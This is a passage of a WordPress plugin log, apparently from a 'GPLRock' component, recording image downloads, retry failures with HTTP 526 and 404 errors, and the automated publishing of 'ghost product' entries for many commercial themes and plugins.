ID: undertone-business-services-shop-elementor-template-kit [29-Mar-2026 01:39:01 UTC] GPLRock: Image downloaded successfully for product unbound-charity-nonprofit-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6a6b55a.webp [29-Mar-2026 01:39:02 UTC] GPLRock: Using pre-downloaded image for product unbound-charity-nonprofit-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6a6b55a.webp [29-Mar-2026 01:39:03 UTC] GPLRock: Ghost product published with image - Product ID: unbound-charity-nonprofit-elementor-template-kit [29-Mar-2026 01:39:11 UTC] GPLRock: Image downloaded successfully for product umarket-digital-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0feb3143.webp [29-Mar-2026 01:39:11 UTC] GPLRock: Using pre-downloaded image for product umarket-digital-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0feb3143.webp [29-Mar-2026 01:39:11 UTC] GPLRock: Ghost product published with image - Product ID: umarket-digital-marketing-elementor-template-kit [29-Mar-2026 01:39:15 UTC] GPLRock: Image downloaded successfully for product ultimateyou-health-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3dcb85b5.jpg [29-Mar-2026 01:39:15 UTC] GPLRock: Using pre-downloaded image for product ultimateyou-health-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3dcb85b5.jpg [29-Mar-2026 01:39:15 UTC] GPLRock: Ghost product published with image - Product ID: ultimateyou-health-coach-elementor-template-kit [29-Mar-2026 01:39:16 UTC] GPLRock: Image downloaded successfully for product ukila-lawyer-attorney-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f2d7695.webp [29-Mar-2026 01:39:17 UTC] GPLRock: Using pre-downloaded image for product ukila-lawyer-attorney-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2f2d7695.webp [29-Mar-2026 01:39:17 UTC] GPLRock: Ghost product published with image - Product ID: ukila-lawyer-attorney-elementor-template-kit [29-Mar-2026 20:36:57 UTC] GPLRock: Image download failed for product home-zone-single-property-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:36:59 UTC] GPLRock: Image download failed for product home-zone-single-property-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/home-zone---single-property-real-estate-wordpress-theme-5494.webp for product home-zone-single-property-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:02 UTC] GPLRock: Image download failed for product home-zone-single-property-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:04 UTC] GPLRock: Image download failed for product home-zone-single-property-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/home-zone---single-property-real-estate-wordpress-theme-5494.webp for product home-zone-single-property-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:06 UTC] GPLRock WARNING: Image download failed for product home-zone-single-property-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/home-zone---single-property-real-estate-wordpress-theme-5494.webp [29-Mar-2026 20:37:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: home-zone-single-property-real-estate-wordpress-theme [29-Mar-2026 20:37:07 UTC] GPLRock: Image download failed for product insurez-insurance-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:09 UTC] GPLRock: Image download failed for product insurez-insurance-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/insurez---insurance-company-wordpress-theme-3512.webp for product insurez-insurance-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:11 UTC] GPLRock: Image download failed for product insurez-insurance-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:14 UTC] GPLRock: Image download failed for product insurez-insurance-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/insurez---insurance-company-wordpress-theme-3512.webp for product insurez-insurance-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:16 UTC] GPLRock WARNING: Image download failed for product insurez-insurance-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/insurez---insurance-company-wordpress-theme-3512.webp [29-Mar-2026 20:37:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: insurez-insurance-company-wordpress-theme [29-Mar-2026 20:37:16 UTC] GPLRock: Image download failed for product majori-minimal-fashion-store-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:18 UTC] GPLRock: Image download failed for product majori-minimal-fashion-store-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/majori---minimal-fashion-store-wordpress-woocommerce-theme-27580.webp for product majori-minimal-fashion-store-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:21 UTC] GPLRock: Image download failed for product majori-minimal-fashion-store-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:23 UTC] GPLRock: Image download failed for product majori-minimal-fashion-store-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/majori---minimal-fashion-store-wordpress-woocommerce-theme-27580.webp for product majori-minimal-fashion-store-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:25 UTC] GPLRock WARNING: Image download failed for product majori-minimal-fashion-store-wordpress-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/majori---minimal-fashion-store-wordpress-woocommerce-theme-27580.webp [29-Mar-2026 20:37:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: majori-minimal-fashion-store-wordpress-woocommerce-theme [29-Mar-2026 20:37:25 UTC] GPLRock: Image download failed for product mamo-creative-portfolio-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:27 UTC] GPLRock: Image download failed for product mamo-creative-portfolio-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mamo---creative-portfolio--multipurpose-wordpress-theme-8654.webp for product mamo-creative-portfolio-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:29 UTC] GPLRock: Image download failed for product mamo-creative-portfolio-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:31 UTC] GPLRock: Image download failed for product mamo-creative-portfolio-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mamo---creative-portfolio--multipurpose-wordpress-theme-8654.webp for product mamo-creative-portfolio-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:33 UTC] GPLRock WARNING: Image download failed for product mamo-creative-portfolio-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mamo---creative-portfolio--multipurpose-wordpress-theme-8654.webp [29-Mar-2026 20:37:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mamo-creative-portfolio-multipurpose-wordpress-theme [29-Mar-2026 20:37:34 UTC] GPLRock: Image downloaded successfully for product aculia-laboratory-research-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97bd071c.webp [29-Mar-2026 20:37:34 UTC] GPLRock: Using pre-downloaded image for product aculia-laboratory-research-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97bd071c.webp [29-Mar-2026 20:37:34 UTC] GPLRock: Ghost product published with image - Product ID: aculia-laboratory-research-wordpress-theme [29-Mar-2026 20:37:34 UTC] GPLRock: Image download failed for product lmsmart-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:36 UTC] GPLRock: Image download failed for product lmsmart-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lmsmart---education-wordpress-theme-1034.webp for product lmsmart-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:39 UTC] GPLRock: Image download failed for product lmsmart-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:41 UTC] GPLRock: Image download failed for product lmsmart-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lmsmart---education-wordpress-theme-1034.webp for product lmsmart-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:43 UTC] GPLRock WARNING: Image download failed for product lmsmart-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lmsmart---education-wordpress-theme-1034.webp [29-Mar-2026 20:37:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lmsmart-education-wordpress-theme [29-Mar-2026 20:37:43 UTC] GPLRock: Image download failed for product topdeal-multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile-layouts-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:45 UTC] GPLRock: Image download failed for product topdeal-multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile-layouts-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/topdeal---multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile--2320.webp for product topdeal-multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile-layouts-ready after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:48 UTC] GPLRock: Image download failed for product topdeal-multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile-layouts-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:50 UTC] GPLRock: Image download failed for product topdeal-multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile-layouts-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/topdeal---multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile--2320.webp for product topdeal-multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile-layouts-ready after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:37:52 UTC] GPLRock WARNING: Image download failed for product topdeal-multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile-layouts-ready. URL: https://meldwp.com/wp-content/uploads/topdeal---multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile--2320.webp [29-Mar-2026 20:37:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: topdeal-multi-vendor-marketplace-elementor-woocommerce-wordpress-theme-mobile-layouts-ready [29-Mar-2026 20:37:56 UTC] GPLRock: Image download failed for product plumbing-plumber-and-handyman-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:37:58 UTC] GPLRock: Image download failed for product plumbing-plumber-and-handyman-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:38:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plumbing---plumber-and-handyman-wordpress-theme-26384.webp for product plumbing-plumber-and-handyman-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:38:00 UTC] GPLRock: Image download failed for product plumbing-plumber-and-handyman-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:38:02 UTC] GPLRock: Image download failed for product plumbing-plumber-and-handyman-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:38:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plumbing---plumber-and-handyman-wordpress-theme-26384.webp for product plumbing-plumber-and-handyman-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:38:04 UTC] GPLRock WARNING: Image download failed for product plumbing-plumber-and-handyman-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/plumbing---plumber-and-handyman-wordpress-theme-26384.webp [29-Mar-2026 20:38:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: plumbing-plumber-and-handyman-wordpress-theme [29-Mar-2026 20:38:05 UTC] GPLRock: Image download failed for product joule-ai-startup-software-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:38:07 UTC] GPLRock: Image download failed for product joule-ai-startup-software-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:38:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/joule---ai-startup-software-elementor-wordpress-theme-16534.webp for product joule-ai-startup-software-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:38:09 UTC] GPLRock: Image download failed for product joule-ai-startup-software-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:38:11 UTC] GPLRock: Image download failed for product joule-ai-startup-software-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [29-Mar-2026 20:38:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/joule---ai-startup-software-elementor-wordpress-theme-16534.webp for product joule-ai-startup-software-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [29-Mar-2026 20:38:13 UTC] GPLRock WARNING: Image download failed for product joule-ai-startup-software-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/joule---ai-startup-software-elementor-wordpress-theme-16534.webp [29-Mar-2026 20:38:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: joule-ai-startup-software-elementor-wordpress-theme [29-Mar-2026 20:38:13 UTC] GPLRock: Image downloaded successfully for product idonte-charity-nonprofit-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1bb5802.webp [29-Mar-2026 20:38:13 UTC] GPLRock: Using pre-downloaded image for product idonte-charity-nonprofit-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1bb5802.webp [29-Mar-2026 20:38:13 UTC] GPLRock: Ghost product published with image - Product ID: idonte-charity-nonprofit-wordpress-theme [29-Mar-2026 20:38:23 UTC] GPLRock: Image downloaded successfully for product royal-elementor-addons-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78ce1ff8.webp [29-Mar-2026 20:38:23 UTC] GPLRock: Using pre-downloaded image for product royal-elementor-addons-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78ce1ff8.webp [29-Mar-2026 20:38:23 UTC] GPLRock: Ghost product published with image - Product ID: royal-elementor-addons-pro [29-Mar-2026 20:38:24 UTC] GPLRock: Image downloaded successfully for product puca-optimized-mobile-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67893929.jpg [29-Mar-2026 20:38:24 UTC] GPLRock: Using pre-downloaded image for product puca-optimized-mobile-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67893929.jpg [29-Mar-2026 20:38:24 UTC] GPLRock: Ghost product published with image - Product ID: puca-optimized-mobile-woocommerce-theme [29-Mar-2026 20:38:26 UTC] GPLRock: Image download failed for product listingpro-wordpress-directory-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [29-Mar-2026 20:38:30 UTC] GPLRock: Image download failed for product listingpro-wordpress-directory-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [29-Mar-2026 20:38:33 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/ListingPro-WordPress-Directory-Theme.jpg for product listingpro-wordpress-directory-theme after 3 attempts. HTTP Code: 404, Error: [29-Mar-2026 20:38:35 UTC] GPLRock: Image download failed for product listingpro-wordpress-directory-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [29-Mar-2026 20:38:38 UTC] GPLRock: Image download failed for product listingpro-wordpress-directory-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [29-Mar-2026 20:38:42 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/ListingPro-WordPress-Directory-Theme.jpg for product listingpro-wordpress-directory-theme after 3 attempts. HTTP Code: 404, Error: [29-Mar-2026 20:38:42 UTC] GPLRock WARNING: Image download failed for product listingpro-wordpress-directory-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/07/ListingPro-WordPress-Directory-Theme.jpg [29-Mar-2026 20:38:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: listingpro-wordpress-directory-theme [29-Mar-2026 20:38:43 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-product-add-ons-extra-options (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fad723af.jpg [29-Mar-2026 20:38:43 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-product-add-ons-extra-options: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fad723af.jpg [29-Mar-2026 20:38:43 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-product-add-ons-extra-options [29-Mar-2026 20:38:45 UTC] GPLRock: Image downloaded successfully for product alone-charity-multipurpose-non-profit-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-20d92c5f.avif [29-Mar-2026 20:38:45 UTC] GPLRock: Using pre-downloaded image for product alone-charity-multipurpose-non-profit-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-20d92c5f.avif [29-Mar-2026 20:38:45 UTC] GPLRock: Ghost product published with image - Product ID: alone-charity-multipurpose-non-profit-wordpress-theme [29-Mar-2026 20:38:46 UTC] GPLRock: Image downloaded successfully for product content-egg-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d71f4e3.jpg [29-Mar-2026 20:38:46 UTC] GPLRock: Using pre-downloaded image for product content-egg-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4d71f4e3.jpg [29-Mar-2026 20:38:46 UTC] GPLRock: Ghost product published with image - Product ID: content-egg-pro [29-Mar-2026 20:38:47 UTC] GPLRock: Image downloaded successfully for product yoast-news-seo-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dfc56d1b.jpg [29-Mar-2026 20:38:48 UTC] GPLRock: Using pre-downloaded image for product yoast-news-seo-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dfc56d1b.jpg [29-Mar-2026 20:38:48 UTC] GPLRock: Ghost product published with image - Product ID: yoast-news-seo-premium [29-Mar-2026 20:38:49 UTC] GPLRock: Image downloaded successfully for product besa-elementor-marketplace-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72aba43b.jpg [29-Mar-2026 20:38:49 UTC] GPLRock: Using pre-downloaded image for product besa-elementor-marketplace-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72aba43b.jpg [29-Mar-2026 20:38:49 UTC] GPLRock: Ghost product published with image - Product ID: besa-elementor-marketplace-woocommerce-theme [29-Mar-2026 20:38:51 UTC] GPLRock: Image downloaded successfully for product thrive-architect (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2da2b5e0.jpg [29-Mar-2026 20:38:54 UTC] GPLRock: Using pre-downloaded image for product thrive-architect: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2da2b5e0.jpg [29-Mar-2026 20:38:55 UTC] GPLRock: Ghost product published with image - Product ID: thrive-architect [29-Mar-2026 20:38:57 UTC] GPLRock: Image downloaded successfully for product lumise-product-designer-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6b8a49bd.jpg [29-Mar-2026 20:38:57 UTC] GPLRock: Using pre-downloaded image for product lumise-product-designer-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6b8a49bd.jpg [29-Mar-2026 20:38:57 UTC] GPLRock: Ghost product published with image - Product ID: lumise-product-designer-woocommerce-wordpress [30-Mar-2026 01:39:01 UTC] GPLRock: Image downloaded successfully for product trendy-travel-tour-travel-travel-agency-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-50a66a74.jpg [30-Mar-2026 01:39:01 UTC] GPLRock: Using pre-downloaded image for product trendy-travel-tour-travel-travel-agency-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-50a66a74.jpg [30-Mar-2026 01:39:01 UTC] GPLRock: Ghost product published with image - Product ID: trendy-travel-tour-travel-travel-agency-theme [30-Mar-2026 01:39:02 UTC] GPLRock: Image downloaded successfully for product admin-columns-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6efcadec.jpg [30-Mar-2026 01:39:02 UTC] GPLRock: Using pre-downloaded image for product admin-columns-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6efcadec.jpg [30-Mar-2026 01:39:02 UTC] GPLRock: Ghost product published with image - Product ID: admin-columns-pro-wordpress-plugin [30-Mar-2026 01:39:04 UTC] GPLRock: Image downloaded successfully for product kinetika-photography-theme-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b68eb978.jpg [30-Mar-2026 01:39:06 UTC] GPLRock: Using pre-downloaded image for product kinetika-photography-theme-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b68eb978.jpg [30-Mar-2026 01:39:06 UTC] GPLRock: Ghost product published with image - Product ID: kinetika-photography-theme-for-wordpress [30-Mar-2026 01:39:11 UTC] GPLRock: Image downloaded successfully for product wpforms-stripe (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40106b9e.jpg [30-Mar-2026 01:39:12 UTC] GPLRock: Using pre-downloaded image for product wpforms-stripe: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40106b9e.jpg [30-Mar-2026 01:39:12 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-stripe [30-Mar-2026 01:39:13 UTC] GPLRock: Image downloaded successfully for product premium-seo-pack-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a9beb20.jpg [30-Mar-2026 01:39:13 UTC] GPLRock: Using pre-downloaded image for product premium-seo-pack-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a9beb20.jpg [30-Mar-2026 01:39:13 UTC] GPLRock: Ghost product published with image - Product ID: premium-seo-pack-wordpress-plugin [30-Mar-2026 01:39:14 UTC] GPLRock: Image downloaded successfully for product ad-inserter-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c15c777d.jpg [30-Mar-2026 01:39:14 UTC] GPLRock: Using pre-downloaded image for product ad-inserter-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c15c777d.jpg [30-Mar-2026 01:39:14 UTC] GPLRock: Ghost product published with image - Product ID: ad-inserter-pro [30-Mar-2026 01:39:16 UTC] GPLRock: Image downloaded successfully for product zeen-next-generation-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5c33ffa.jpg [30-Mar-2026 01:39:16 UTC] GPLRock: Using pre-downloaded image for product zeen-next-generation-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5c33ffa.jpg [30-Mar-2026 01:39:16 UTC] GPLRock: Ghost product published with image - Product ID: zeen-next-generation-magazine-wordpress-theme [30-Mar-2026 01:39:17 UTC] GPLRock: Image downloaded successfully for product classiera-classified-ads-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-718ab19f.jpg [30-Mar-2026 01:39:18 UTC] GPLRock: Using pre-downloaded image for product classiera-classified-ads-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-718ab19f.jpg [30-Mar-2026 01:39:19 UTC] GPLRock: Ghost product published with image - Product ID: classiera-classified-ads-wordpress-theme [30-Mar-2026 01:39:21 UTC] GPLRock: Image download failed for product univero-education-lms-courses-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [30-Mar-2026 01:39:25 UTC] GPLRock: Image download failed for product univero-education-lms-courses-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [30-Mar-2026 01:39:28 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Univero-Education-LMS-Courses-WordPress-Theme.jpg for product univero-education-lms-courses-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [30-Mar-2026 01:39:29 UTC] GPLRock: Image download failed for product univero-education-lms-courses-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [30-Mar-2026 01:39:33 UTC] GPLRock: Image download failed for product univero-education-lms-courses-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [30-Mar-2026 01:39:36 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Univero-Education-LMS-Courses-WordPress-Theme.jpg for product univero-education-lms-courses-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [30-Mar-2026 01:39:36 UTC] GPLRock WARNING: Image download failed for product univero-education-lms-courses-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/08/Univero-Education-LMS-Courses-WordPress-Theme.jpg [30-Mar-2026 01:39:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: univero-education-lms-courses-wordpress-theme [30-Mar-2026 01:39:37 UTC] GPLRock: Image downloaded successfully for product anywhere-elementor-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e299956c.jpg [30-Mar-2026 01:39:38 UTC] GPLRock: Using pre-downloaded image for product anywhere-elementor-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e299956c.jpg [30-Mar-2026 01:39:38 UTC] GPLRock: Ghost product published with image - Product ID: anywhere-elementor-pro-wordpress-plugin [30-Mar-2026 02:09:10 UTC] GPLRock: Image downloaded successfully for product themeisle-didi-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ee4de77.jpg [30-Mar-2026 02:09:10 UTC] GPLRock: Using pre-downloaded image for product themeisle-didi-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1ee4de77.jpg [30-Mar-2026 02:09:10 UTC] GPLRock: Ghost product published with image - Product ID: themeisle-didi-wordpress-theme [30-Mar-2026 02:09:12 UTC] GPLRock: Image downloaded successfully for product formidable-forms-wpml-multilingual (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b656c289.jpg [30-Mar-2026 02:09:12 UTC] GPLRock: Using pre-downloaded image for product 